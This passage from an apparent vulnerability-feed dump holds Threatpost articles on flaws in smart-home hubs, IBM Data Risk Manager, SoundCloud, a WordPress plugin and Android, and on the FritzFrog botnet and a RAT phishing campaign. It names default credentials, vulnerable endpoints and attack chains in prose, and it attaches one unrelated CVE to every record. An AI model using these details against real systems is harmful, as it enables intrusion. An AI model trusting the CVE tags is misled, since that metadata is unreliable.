From there, attackers can intercept firmware updates and uncover the hardcoded root password, valid for all Fibaro Home Center Lite devices, which can be “trivially brute-forced,” according to the security firm.

Attackers can also manipulate user credentials for the device’s web interface, stored in an SQLite database on Fibaro Home Center Lite.

“These passwords are stored SHA-1 hashed, created from the supplied password salted with a hardcoded string that can easily be extracted from a script in the firmware image file,” the analysis detailed. “Using the salt, an attacker can rewrite existing credentials in the appropriate row of the Home Center Lite’s SQLite database located at /mnt/user_data/db, rendering the legitimate password invalid.”

Fibaro issued patches for the issues, so that the home hubs now verify server certificates and disallow command injections; and the hardcoded root password has been replaced with a “longer and more secure alternative,” according to ESET.

The hardcoded salt string used to create the SHA-1 hash of the password is, however, a lingering issue.

**Homematic Central Control Unit (CCU2)**

The Homematic CCU2 (firmware version 2.31.25) harbors a bug that would allow unauthenticated remote code execution (RCE) as a root user.

The issue arises from a common gateway interface (CGI) script that handles the logout procedure of the Homematic CCU2’s web-based administration interface.

“The $sid (session ID) parameter was not properly escaped, enabling an attacker to inject malicious code and run arbitrary shell commands as the root (administrator) user,” according to the research. “As the logout script did not check that it is processing a request from a currently logged-in session, an unlimited number of these requests could be made by an attacker without ever having to log into the device.”

Using this, an attacker could set a new root password.

The issue has been patched.

**Elko’s eLAN-RF-003**

The eLAN-RF-003 (firmware version 2.9.079) is a smart RF box that allows users to control a variety of systems such as lighting, hot-water temperature, heating, smart locks, shutters, blinds, fans, power outlets and more via an application installed on a smartphone.

ESET uncovered critical vulnerabilities in the hub, including the use of the unencrypted HTTP protocol for the box’s web GUI communication; essentially, all user communications – including sensitive data such as usernames and passwords – were sent over the network without encryption or any other form of protection, allowing any attacker to intercept the information in the clear.

Also at issue: inadequate authentication, allowing all commands to be executed without requesting a login; a lack of session cookies, thus lacking any mechanism that could verify that the user was correctly logged in; and peripheral devices connected to the smart RF box were vulnerable to record-and-replay attacks.

“Unauthenticated access to the web interface is a severe issue, as it gives anyone with access to the local network the ability to take control over the smart RF box and subsequently all the devices connected to it,” according to the analysis.
“This is especially worrying due to possible combination with other vulnerabilities that allow the attacker to gain a foothold in the local Wi-Fi network.”

Attackers would be able to extract information about peripheral devices, floor plans, errors, attributes of the managed smart home, the device’s firmware version, and so on, ESET noted.

Unfortunately, two of the reported vulnerabilities (the unencrypted web interface communication and insecure radio frequency (RF) communication) appear to have remained unpatched, while only partial patches were issued for the others, ESET said. That said, the researchers haven’t probed the latest generation of the device.

Threatpost has reached out to the vendors for further comment.

“Most of the flaws disclosed by ESET have been fixed by the vendors of these particular devices,” the researchers concluded. “However, some of the issues appear to have been left unresolved, at least on older generations of devices. Even if newer, more secure generations are available, though, the older ones are still in operation…. [security vulnerabilities in IoT devices](<https://threatpost.com/half-iot-devices-vulnerable-severe-attacks/153609/>) are a prevalent issue.”

Record: “Connected Home Hubs Open Houses to Full Remote Takeover” (Threatpost; published 2020-04-22T18:28:23; modified 2020-04-22T18:28:23; id THREATPOST:FB79AC722601BBB92388FFC66EE0EAF4; cvelist CVE-2020-5135; cvss score 0.0, vector NONE) – https://threatpost.com/connected-home-hubs-full-remote-takeover/155037/

---

Record last seen 2020-10-14T22:26:14:

UPDATED

Four serious security vulnerabilities in the IBM Data Risk Manager (IDRM) have been identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis – and a proof-of-concept exploit is available.

IBM weighed in on the problem this week, after a researcher went public with the bugs, one of which may end up being a zero-day issue — Big Blue is still investigating.

IDRM is a software platform that aggregates threat data from disparate security systems, in order to perform enterprise security risk analysis. According to security researcher Pedro Ribeiro from Agile Information Security, older versions (v. 2.0.1 to 2.0.3) of the IDRM Linux virtual appliance contain bugs pertaining to authentication bypass; command injection; insecure default password; and arbitrary file download. The first three can be chained together to achieve RCE in vulnerable versions.

“IDRM is an enterprise security product that handles very sensitive information,” Ribeiro wrote in a [Tuesday analysis](<https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md>).
“The hacking of an IDRM appliance might lead to a full-scale company compromise, as it stores credentials to access other security tools, not to mention it contains information about critical vulnerabilities that affect the company.”

**Three Chained Bugs for RCE**

The first three bugs that Ribeiro found can be combined to allow a remote attacker to gain full system compromise, according to the research.

The first is as yet unaddressed by IBM: an authentication-bypass issue that exists in the appliance’s API endpoint, /albatross/user/login. This endpoint is authenticated by a method that takes the username and sessionID credentials of the person trying to log in, and checks if the username exists in the database and if the sessionId is associated with that username. If it all checks out, the application returns a newly generated random password for that username. However, Ribeiro demonstrated that a remote attacker can send a specially crafted request that subverts this process and allows an attacker to retrieve a valid Bearer administrative token. That can then be used to access various APIs.

“It’s also possible to login as a normal web user on the /albatross/login endpoint, which will yield an authenticated cookie instead of a token, allowing access to the web administration console,” explained the researcher. “In any case … authentication is now completely bypassed and we have full administrative access to IDRM.”

The command-injection bug, which has a patch, meanwhile exists because the IDRM exposes an API at /albatross/restAPI/v2/nmap/run/scan that allows an authenticated user to perform nmap scans.

“Having access to nmap allows running arbitrary commands, if we can upload a script file and then pass that as an argument to nmap with --script=<FILE>,” the researcher explained. “However, to achieve code execution in this way, we still need to upload a file. Luckily, there is a method that processes patch files and accepts arbitrary file data, saving it to /home/a3user/agile3/patches/<FILE>.”

That method is supposed to accept a patch file, process it and apply it. However, Ribeiro explained that “there are several bugs in version 2.0.2 that cause the method to abort early and fail to process the file. Still, the file is uploaded and kept on disk even after the method aborts.”

In order to exploit this bug, an attacker would need to have an authenticated session as an administrator, which can be achieved with the first vulnerability.

The third bug, which IBM says can be solved by reconfiguring the appliance, comes from the use of hard-coded credentials: the administrative user in the IDRM virtual appliance is “a3user” by default.

“This user is allowed to login via SSH and run sudo commands, and it is set up with a default password of ‘idrm,’” said Ribeiro.

And, when combined with the first two bugs, this allows an unauthenticated attacker to achieve RCE as root on the IDRM virtual appliance, leading to complete system compromise, the researcher said.

A Metasploit [proof-of-concept exploit module](<https://github.com/rapid7/metasploit-framework/pull/13300>) implementing the full RCE chain has been released and a video demonstration can be [found here](<https://asciinema.org/a/3nJ4lD1pD7XBfEFqkc9qPDUV2>).

**Arbitrary File Download**

The fourth bug, also fixed in later versions, is a path traversal bug that comes from an improper limitation of a pathname to a restricted directory.

“IDRM exposes an API at /albatross/eurekaservice/fetchLogFiles that allows an authenticated user to download log files from the system,” explained Ribeiro. “However, the logFileNameList parameter contains a basic directory traversal flaw that allows an attacker to download any file off the system.”

He added that exploitation is “very simple.”

This flaw too can be chained. When combined with the first authentication-bypass bug, an unauthenticated attacker can download any file readable by “a3user” off the system, Ribeiro said. A [second Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/13301>) implementing this was released and a video demo [can be found here](<https://asciinema.org/a/y6HfoaEIf8qZbn6mcUGeVhyUp>).

**Patch Information and Mitigation**

Versions 2.0.1 to 2.0.3 have been confirmed as vulnerable to the first three flaws, according to Ribeiro; as for the fourth issue, version 2.0.1 is not vulnerable, but v. 2.0.2 and 2.0.3 are. According to [IBM’s advisory](<https://www.ibm.com/support/pages/node/6195705>), issued on April 22 after Ribeiro disclosed his findings, the command-injection vulnerability and the arbitrary-file download bug were both fixed in version 2.0.4. IBM also said that the default-password issue is a configuration choice and up to administrators to change ([guidance available here](<https://www.ibm.com/support/knowledgecenter/en/SSJQ6V_2.0.6/com.ibm.idrm.doc/install/tsk/tsk_installguide_idrm_configuration.html>)).

As for the first vulnerability, the authentication bypass, IBM said in the advisory that it is “investigating this report and will provide further information on fix action as appropriate.”

The current version of the IDRM is v.
2.0.6.\n\nInitially, Ribeiro made an attempt to coordinate disclosure with IBM via CERT/CC, but IBM did not accept the vulnerability report for review:\n\n_\u201cWe have assessed this report and closed as being out of scope for our vulnerability disclosure program since this product is only for \u2018enhanced\u2019 support paid for by our customers,\u201d according to Big Blue\u2019s response to CERT/CC. \u201cThis is outlined in our policy https://hackerone.com/ibm. To be eligible to participate in this program, you must not be under contract to perform security testing for IBM Corporation, or an IBM subsidiary, or IBM client within six months prior to submitting a report.\u201d_\n\nHowever, after Ribeiro made his findings public, Big Blue said the rejection was a mistake.\n\n\u201cA process error resulted in an improper response to the researcher who reported this situation to IBM,\u201d a spokesperson told Threatpost on Tuesday. \u201cWe have been working on mitigation steps and they will be discussed in a security advisory to be issued.\u201d\n\n_This article was updated at 4 p.m. ET on Tuesday, April 21 with a statement from IBM, and at 10 a.m. ET on Wednesday, April 22 with fresh advisory information from IBM._
\n", "cvss3": {}, "published": "2020-04-21T18:19:01", "type": "threatpost", "title": "RCE Exploit Released for IBM Data Risk Manager", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-04-21T18:19:01", "id": "THREATPOST:C9AB0B1EBE1A344DC385414BD784DFC7", "href": "https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:21:31", "description": "A peer-to-peer (P2P) botnet called FritzFrog has hopped onto the scene, and researchers said it has been actively breaching SSH servers since January.\n\nSSH servers are pieces of software found in routers and IoT devices, among other machines, and they use the secure shell protocol to accept connections from remote computers. SSH servers are common in enterprise and consumer environments alike.\n\nAccording to an analysis from Guardicore Labs, FritzFrog propagates as a worm, brute-forcing credentials at entities like governmental offices, educational institutions, medical centers, banks and telecom companies. FritzFrog has attempted to compromise tens of millions of machines so far, and has successfully breached more than 500 servers in total, Guardicore researcher Ophir Harpaz said. Victims include well-known universities in the U.S. and Europe, and a railway company; and the most-infected countries are China, South Korea and the U.S.\n\n\u201cFritzFrog executes a worm malware which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk,\u201d Harpaz explained, [in a posting](<https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/>) on Wednesday. 
Once the server is compromised, \u201cthe malware creates a backdoor in the form of an SSH public key, enabling the attackers ongoing access to victim machines.\u201d\n\nIt also can drop additional payloads, such as cryptominers.\n\n## **Swimming in a Unique Pond**\n\nFritzFrog is a P2P botnet, meaning that it has greater resiliency than other types of botnets because control is decentralized and spread among all nodes; as such, there\u2019s no single point-of-failure and no command-and-control server (C2).\n\n\u201cFritzFrog is completely proprietary; its P2P implementation was written from scratch, teaching us that the attackers are highly professional software developers,\u201d Harpaz said. She added, \u201cThe P2P protocol is completely proprietary, relying on no known P2P protocols such as \u03bcTP.\u201d\n\nAs far as the other technical details go, Guardicore analyzed the botnet by injecting its own nodes into the mix, giving researchers the ability to participate in the ongoing P2P traffic and see how it was built.\n\nThey discovered that almost everything about FritzFrog is unique when compared with past P2P botnets: Harpaz noted that it doesn\u2019t use IRC like IRCflu; it operates in-memory unlike another [cryptomining botnet, DDG](<https://threatpost.com/p2p-ddg-botnet-unstoppable/154650/>); and runs on Unix-based machines unlike others like the InterPlanetary Storm botnet.\n\nAdditionally, its fileless payload is unusual. Harpaz wrote that files are shared over the network to both infect new machines and run new malicious payloads on compromised ones \u2013 and that this is accomplished completely in-memory using blobs.\n\n\u201cWhen a node A wishes to receive a file from its peer, node B, it can query node B which blobs it owns using the command getblobstats,\u201d according to the researcher. \u201cThen, node A can get a specific blob by its hash, either by the P2P command getbin or over HTTP, with the URL http://:1234/. 
When node A has all the needed blobs \u2013 it assembles the file using a special module named Assemble and runs it.\u201d\n\nOnce the malware is installed on a target by this method, it begins listening on port 1234, waiting for initial commands that will sync the victim with a database of network peers and brute-force targets. Once this initial syncing is finished, FritzFrog gets creative on the detection-evasion front when it comes to further communication from outside the botnet: \u201cInstead of sending commands directly over port 1234, the attacker connects to the victim over SSH and runs a netcat client on the victim\u2019s machine,\u201d according to the analysis. \u201cFrom this point on, any command sent over SSH will be used as netcat\u2019s input, thus transmitted to the malware.\u201d\n\nMeanwhile, the botnet constantly updates itself with databases of targets and breached machines as it worms through the internet.\n\n\u201cNodes in the FritzFrog network keep in close contact with each other,\u201d Harpaz noted. \u201cThey constantly ping each other to verify connectivity, exchange peers and targets and keep each other synced. The nodes participate in a clever vote-casting process, which appears to affect the distribution of brute-force targets across the network. Guardicore Labs observed that targets are evenly distributed, such that no two nodes in the network attempt to \u2018crack\u2019 the same target machine.\u201d\n\nFurther, it was built with an extensive dictionary of breached names and passwords for brute-forcing purposes, making it highly aggressive (\u201cBy comparison, DDG, a recently discovered P2P botnet, used only the username \u2018root,'\u201d said Harpaz).\n\nThe malware also spawns multiple threads to perform various tasks simultaneously. 
For instance, an IP address in the target queue will be fed to a Cracker module, which in turn will scan the machine attached to the IP address and try to brute-force it; a machine which was successfully breached is queued for malware infection by the DeployMgmt module; and a machine which was successfully infected will be added to the P2P network by the Owned module.\n\nIn the event of a reboot of the compromised system, the malware leaves a backdoor behind, whose login credentials are saved by the network peers.\n\n\u201cThe malware adds a public SSH-RSA key to the authorized_keys file,\u201d according to the research. \u201cThis simple backdoor allows the attackers \u2013 who own the secret private key \u2013 for passwordless authentication, in case the original password was modified.\u201d\n\nThe malware also monitors the file system state on infected machines, periodically checking for available RAM, uptime, SSH logins and CPU-usage statistics. Other nodes take this information and use it to determine whether to run a cryptominer or not.\n\nIf it decides to run a cryptominer, the malware runs a separate process called \u201clibexec\u201d to mine the Monero cryptocurrency with an XMRig spinoff. Though this secondary infection is what the botnet has so far been used for, its architecture means that it could also install any other type of malware on infected nodes, should its authors decide to do so.\n\nIn all, FritzFrog is highly advanced, Harpaz said, but there\u2019s a simple way to ward off a compromise: \u201cWeak passwords are the immediate enabler of FritzFrog\u2019s attacks,\u201d she said. \u201cWe recommend choosing strong passwords and using public key authentication, which is much safer.\u201d\n\nAdmins should also remove FritzFrog\u2019s public key from the authorized_keys file, preventing the attackers from accessing the machine, she said. 
And, \u201crouters and IoT devices often expose SSH and are thus vulnerable to FritzFrog; consider changing their SSH port or completely disabling SSH access to them if the service is not in use.\u201d\n", "cvss3": {}, "published": "2020-08-19T20:46:31", "type": "threatpost", "title": "FritzFrog Botnet Attacks Millions of SSH Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-08-19T20:46:31", "id": "THREATPOST:639CADC540E81321048EB418C2EC7586", "href": "https://threatpost.com/fritzfrog-botnet-millions-ssh-servers/158489/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:30:31", "description": "Online music platform SoundCloud, which can be thought of as an audio-based YouTube for music creators, has addressed several security bugs in its APIs that could lead to denial-of-service (DoS) or account takeover via credential-stuffing.\n\nSoundCloud recently [sold a $75 million stake](<https://techcrunch.com/2020/02/11/music-streaming-pioneer-soundcloud-raises-75m-from-pandora-owner-siriusxm/>) to satellite radio 
giant SiriusXM and the two also inked a lucrative ad deal. SoundCloud claims to host 200 million different music tracks on its online platform.\n\nAccording to researcher Paulo Silva of Checkmarx Security Research, three different groups of security vulnerabilities were found in the platform: An authentication issue which could lead to account takeover; a rate-limiting bug that could lead to DoS; and an improper input validation.\n\nThe broken authentication issue has to do with not having a set number of login tries before locking someone out of the account \u2013 which opens the door to unlimited brute-force attacks from cybercriminals trying to guess passwords.\n\n\u201cThe /sign-in/password endpoint of api-v2.soundcloud.com does not implement proper account lockout based on failed authentication attempts,\u201d according to Silva, in [an analysis](<https://www.checkmarx.com/blog/checkmarx-research-soundcloud-api-security-advisory>) posted Tuesday. \u201cIt solely relies on rate limiting which can be evaded using several combinations of use_agent, device_id and signature.\u201d\n\nThat means that credential stuffing \u2014 the automated process of verifying that breached pairs of usernames and passwords work for not only the services that they originated from, but also other services \u2014 could have become a real issue. Digital Shadows [recently pointed out](<https://threatpost.com/password-breaches-fueling-booming-credential-stuffing-business/125900/>) that the market for credential stuffing software and services is thriving thanks in large part to an epidemic of breaches of usernames and passwords.\n\nCheckmarx also found a related user enumeration weakness that could be used to verify valid user account IDs as well, making it even easier to hack accounts. 
An attacker can exploit this to guess account names and then probe whether or not they actually exist.\n\n\u201cBoth /sign-in/identifier and /users/password_reset endpoints of api-v2.soundcloud.com can be used to enumerate user accounts,\u201d explained the firm. \u201cIn both cases, the endpoints provide different responses depending on whether the requested user account identifier exists or not.\u201d\n\nThe rate-limiting issue meanwhile has to do with SoundCloud not limiting how many song results can be retrieved in certain searches.\n\nFor instance, the /me/play-history/tracks API endpoint, which allows users to view recently played songs, doesn\u2019t enforce rate limiting. Thus, an attacker can send a large number of POST requests from a single machine/IP address, or can use a high-volume GET request to return hundreds of tracks at once. This can not only potentially overwhelm the API if several of these are sent at the same time, but it could also be used to artificially inflate the statistics for demand for certain tracks or artists.\n\n\u201cThe lack of rate limiting may compromise the system availability, making it vulnerable to DoS attacks,\u201d according to Checkmarx. 
\u201cFrom a business perspective, not limiting the amount of requests to this endpoint may compromise the data integrity, since it may create biased tracks-statistics.\u201d\n\nA related issue has to do with the /tracks endpoint of api-v2.soundcloud.com, which Silva said does not implement proper resources limiting \u2013 also potentially leading to DoS.\n\n\u201cSince no validation is performed regarding the number of tracks IDs in the ids list, it is possible to manipulate the list to retrieve an arbitrary number of tracks in a single request,\u201d he said, adding that in testing, researchers were able to retrieve up to 689 tracks in a single request.\n\n\u201cUsing a specially crafted list of track IDs to maximize the response size, and issuing requests from several sources at the same time to deplete resources in the application layer, will make the target\u2019s system services unavailable,\u201d Silva explained.\n\nThe improper input validation issue meanwhile would allow the attacker to use extra-long character strings when filling in the description, title and genre forms while uploading songs, according to the research. An exploit could make use of this to carry out cross-site scripting attacks or SQL injection.\n\n\u201cThe /tracks/{track_urn} endpoint of api-v2.soundcloud.com does not properly validate and enforce the length of [these] properties,\u201d Silva explained. \u201cIssuing requests directly to the API server puts the attacker in control of an additional 61960 bytes (total of 66160 bytes).\u201d\n\nFor its part, SoundCloud promptly fixed the problem and sent out a statement: \u201cAt SoundCloud, the security of our users\u2019 accounts is extremely important to us. We are always looking for ways to enhance the security of our platform for our users. 
We appreciate Checkmarx reaching out to discuss their findings.\u201d\n", "cvss3": {}, "published": "2020-02-12T18:48:59", "type": "threatpost", "title": "SoundCloud Tackles DoS, Account Takeover Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-02-12T18:48:59", "id": "THREATPOST:4A02969D23A7147DEF39EFDE11D3094E", "href": "https://threatpost.com/soundcloud-dos-account-takeover/152838/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:28:08", "description": "The legitimate remote access tool (RAT) called NetSupport Manager, used for troubleshooting and tech support, is being converted into a malicious weapon by cybercriminals. Researchers at Palo Alto Networks\u2019 Unit 42 division have spotted a spam campaign attempting to deliver a malicious Microsoft Word document that uses the disguise of a NortonLifeLock-protected file.\n\nNortonLifeLock is a security utility for password-protecting attachments, among other things. If a recipient opens the document via Microsoft Office Outlook, a prompt appears that asks users to \u201cenable content\u201d to open the document \u2013 clicking \u201cyes\u201d executes macros.\n\n\u201cTo the user, the document appears to contain personal information that requires a password to view,\u201d said researchers, in a [recent analysis](<https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/>). 
\u201cOnce the document is opened and the user clicks \u2018Enable Content,\u2019 the macro is executed and the user is presented with a password dialog box.\u201d\n\nResearchers added that the password is likely provided in the body of the phishing email, because it has to be correct; no malicious activity occurs until the correct key is entered. Once the key is accepted, the macros create and execute a batch file called alpaca.bat.\n\n\u201cThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two characters that are eventually linked together to construct the final command to download and execute the RAT on the victim,\u201d according to Unit 42. \u201cThe command string is executed via the VBA shell function, which [creates and executes alpaca.bat].\u201d\n\nThe campaign uses a range of tactics to obfuscate its activity from both dynamic and static analysis, according to researchers. For instance, the batch script uses msiexec, which is a legitimate part of the Windows Installer service. It\u2019s used to download and install a Microsoft Intermediate Language (MSIL) binary from a legitimate domain, which has been compromised. Once downloaded, the binary will execute using the /q parameter to suppress any Windows dialogs from the user.\n\nThe campaign also uses the PowerShell PowerSploit framework to carry out the installation of the malicious file. The MSI installs a PowerShell script in the victim\u2019s %temp% directory named REgistryMPZMZQYVXO.ps1. This contains another PowerShell script that is responsible for installing the NetSupport Manager RAT onto the victim\u2019s machine.\n\n\u201cThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the PowerSploit framework,\u201d according to the analysis. 
\u201cIt contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher mode of Cipher Block Chain (CBC).\u201d\n\nThe RAT installer PowerShell script interestingly aborts installation if Avast or AVG Antivirus Software is running on the target machine. If not, it installs 12 files that make up the NetSupport Manager RAT to a random directory and sets up persistence by creating the following registry key: HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run.\n\n\u201cOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain geo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST,\u201d the researchers wrote.\n\nResearchers said that the campaign is likely part of a larger offensive that dates back to early November, with email subject lines reusing themes associated with refunds, as well as transaction and order inquiries. The attached documents contain the target company\u2019s name.\n\n\u201cMalicious use of the NetSupport Manager remote access tool has also been reported by both [FireEye ](<https://www.fireeye.com/blog/threat-research/2018/04/fake-software-update-abuses-netsupport-remote-access-tool.html>)and [Zscaler ](<https://www.zscaler.com/blogs/research/netsupport-rat-installed-fake-update-notices>)researchers,\u201d researchers concluded. 
\u201cWhile this activity appears to be broad and at large scale, there are indications, such as the document name, that show the actor\u2019s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\u201d\n", "cvss3": {}, "published": "2020-03-02T21:59:34", "type": "threatpost", "title": "NetSupport Manager RAT Spread via Bogus NortonLifeLock Docs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-02T21:59:34", "id": "THREATPOST:EBE40A69B865E25E52FF87060EDD790F", "href": "https://threatpost.com/netsupport-manager-rat-nortonlifelock-docs/153387/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-14T22:27:42", "description": "A critical vulnerability in a WordPress plugin known as \u201cThemeREX Addons\u201d could open the door for remote code execution in tens of thousands of websites. According to Wordfence, the bug has been actively exploited in the wild as a zero-day.\n\nThe plugin, which is installed on approximately 44,000 sites, is used to apply various \u201cskins\u201d that govern the look and feel of web destinations, including theme-enhancing features and widgets.\n\nTo provide compatibility with WordPress\u2019 Gutenberg plugin, the ThemeREX Addons plugin uses an API, according to Wordfence researcher Chloe Chamberland, writing in [a blog posting](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) on Monday. When the API interacts with Gutenberg, the touchpoints of that communication are known as endpoints. ThemeREX uses the \u201c~/includes/plugin.rest-api.php\u201d file to register an endpoint (\u201c/trx_addons/v2/get/sc_layout\u201d), which in turn calls the \u201ctrx_addons_rest_get_sc_layout\u201d function.\n\nThis introduces an access-control problem, the researcher noted. 
In unpatched versions of ThemeREX, \u201cthere were no capability checks on this endpoint that would block users that were not administrators or currently signed in, so any user had the ability to call the endpoint regardless of capability,\u201d she explained. \u201cIn addition, there was no nonce check to verify the authenticity of the source.\u201d\n\nFurther down in the code, there\u2019s also a functionality used to get parameters from widgets that work with the Gutenberg plugin.\n\n\u201cThis is where the core of the remote code execution vulnerability was present,\u201d Chamberland wrote. \u201cThere were no restrictions on the PHP functions that could be used or the parameters that were provided as input. Instead, we see a simple if (function_exists($sc)) allowing for any PHP function to be called and executed.\u201d\n\nThe upshot of this is that adversaries can use various WordPress functions \u2013 for instance, in attacks in the wild, the \u201cwp_insert_user\u201d function was used to create administrative user accounts and take over sites, according to the research.\n\nThemeREX has now addressed the issue by completely removing the affected ~/plugin.rest-api.php file from the plugin \u2013 users should update to the latest version to stay protected.\n\nWordPress plugins continue to be a rich avenue of attack for cybercriminals. 
Last month, popular WordPress plugin Duplicator, which has more than 1 million active installations, [was discovered to have](<https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/>) an unauthenticated arbitrary file download vulnerability that was being attacked.\n\nAnd, earlier in February a critical flaw in a popular WordPress plugin that helps make websites compliant with the General Data Protection Regulation (GDPR) [was disclosed](<https://threatpost.com/critical-wordpress-plugin-bug-afflicts-700k-sites/152871/>); it could enable attackers to modify content or inject malicious JavaScript code into victim websites. It affected 700,000 sites.
\n", "cvss3": {}, "published": "2020-03-10T20:30:36", "type": "threatpost", "title": "Popular ThemeREX WordPress Plugin Opens Websites to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2020-03-10T20:30:36", "id": "THREATPOST:CEFF4DB144B2E463CD3FB46A8A93EEF8", "href": "https://threatpost.com/themerex-wordpress-plugin-remote-code-execution/153592/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:09", "description": "Researchers have discovered a new Android vulnerability that could allow malware to pose as popular apps and ask for various permissions, potentially allowing hackers to listen in on users, take photos, read and send SMS messages, and basically take over various functions as if they are the device\u2019s owner.\n\nSecurity researchers John H\u00f8egh-Omdal, Caner Kaya and Markus Ottensmann at Norwegian app-security provider [Promon](<https://promon.co/>) discovered the flaw\u2014which they dubbed \u201cStrandHogg\u201d from old Norse for the Viking tactic of plundering villages and holding people for ransom. They said attackers can use the vulnerability to allow \u201creal-life malware to pose as legitimate apps, with users unaware they are being targeted,\u201d according to a [blog post](<https://promon.co/security-news/strandhogg/>).\n\n\u201cThe attack can be designed to request permissions which would be natural for different targeted apps to request, in turn lowering suspicion from victims,\u201d researchers wrote. \u201cUsers are unaware that they are giving permission to the hacker and not the authentic app they believe they are using.\u201d\n\nIf the flaw is exploited, to users it appears that they are clicking on an app that they use every day, such as Facebook or Instagram. 
However, what happens when they click on the app is that instead of the app a user intended to open starting up, malware is deployed that can give permissions to the hacker, who is directed to the legitimate app, researchers said.\n\nThe flaw, which can be exploited by \u201creal-life malware,\u201d affects all Android devices, including those running Android 10, they said, as well as puts the top 500 most popular apps at risk.\n\nResearchers from Promon partner Lookout already have identified 36 malicious apps exploiting the vulnerability, which can be done without gaining root access to the device, according to the post. Among those apps were variants of the BankBot Trojan\u2014widespread malware that\u2019s been detected all over the world\u2013observed as early as 2017, researchers said.\n\nMoreover, the persistent problem of malware slipping under the radar on Google Play is what appears to be responsible for the spread of malicious code that exploits the flaw, researchers said. While the specific malware sample that Promon researchers analyzed did not reside on the app store, it was installed through several dropper apps/hostile downloaders distributed on Google Play, they said.\n\nWhile these apps have since been removed, dropper apps continue to be published in spite of protections that exist on the store, researchers said. In fact, some are being downloaded millions of times before being spotted and deleted, they said.\n\nIndeed, Google has [struggled mightily](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>) with malware [making its way onto Google Play](<https://threatpost.com/google-play-malicious-apps-racked-up-335m-installs-in-september/148810/>) under its watch and recently has taken [new steps](<https://threatpost.com/google-bad-android-apps/149981/>) to try to alleviate this problem. 
The discovery of StrandHogg appears to make the need for better security for Android mobile apps all that more urgent.\n\nIndeed, the existence of the vulnerability already being exploited in the wild certainly is troubling, as it means users already likely have been compromised and remain at critical risk, observed Sam Bakken, senior product marketing manager, for digital identity and anti-fraud solution provider [OneSpan](<https://www.onespan.com/>).\n\n\u201cAs you might imagine, criminals salivate over the monetization potential in stolen mobile banking credentials and access to one-time-passwords sent via SMS,\u201d he said in an e-mail to Threatpost. \u201cPromon\u2019s recent findings make the vulnerability as severe as it\u2019s ever been.\u201d\n\nThere is some good news in all of this, Bakken said. Security solutions do exist \u201cunder the umbrella of in-app protection\u201d that can protect devices from malware exploiting StrandHogg, including \u201capp shielding and runtime protection [that] make it easier for app developers to mitigate these windows of exposure resulting from security issues in both Android and iOS,\u201d he said.\n\n**[Free Threatpost Webinar:](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>)** _**Risk around third-party vendors is real and can lead to data disasters. We rely on third-party vendors, but that doesn\u2019t mean forfeiting security. [Join us on Dec. 18th at 2 pm EST](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>) as Threatpost looks at managing third-party relationship risks with industry experts Dr. Larry Ponemon, of Ponemon Institute; Harlan Carvey, with Digital Guardian and Flashpoint\u2019s Lance James. 
[Click here to register](<https://attendee.gotowebinar.com/register/7725318633369800449?source=art>).**_\n", "cvss3": {}, "published": "2019-12-03T13:26:14", "type": "threatpost", "title": "\u2018StrandHogg\u2019 Vulnerability Allows Malware to Pose as Legitimate Android Apps", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135"], "modified": "2019-12-03T13:26:14", "id": "THREATPOST:B9E2C282835BF652ABC49052C859DBCC", "href": "https://threatpost.com/strandhogg-vulnerability-allows-malware-to-pose-as-legitimate-android-apps/150750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:43", "description": "Mozilla is bumping up its bug bounty payouts and has added new websites and services \u2013 including the recently deployed [Firefox Monitor](<https://threatpost.com/mozilla-announces-firefox-monitor-tool-testing-firefox-61/133087/>)\u2013 to its bug bounty program in hopes of attracting more researchers to sniff out vulnerabilities.\n\nThe browser-maker is doubling bug bounty payouts for most of its in-scope sites and services, as well as tripling payouts for the highest bug classification in its program, remote code execution vulnerabilities. Researchers can now [bring in $15,000](<https://www.mozilla.org/en-US/security/web-bug-bounty/>) for RCE flaws on \u201ccritical websites\u201d (sites and services considered critical to Mozilla operations, which pay out at the highest bounty rate) and $5,000 for \u201ccore websites\u201d (which pay out bounties, but at a reduced rate).\n\n\u201cMozilla was one of the first companies to establish a bug bounty program and we continually adjust it so that it stays as relevant now as it always has been,\u201d said Simon Bennetts with Mozilla [in a Tuesday announcement](<https://blog.mozilla.org/security/2019/11/19/updates-to-the-mozilla-web-security-bounty-program/>). 
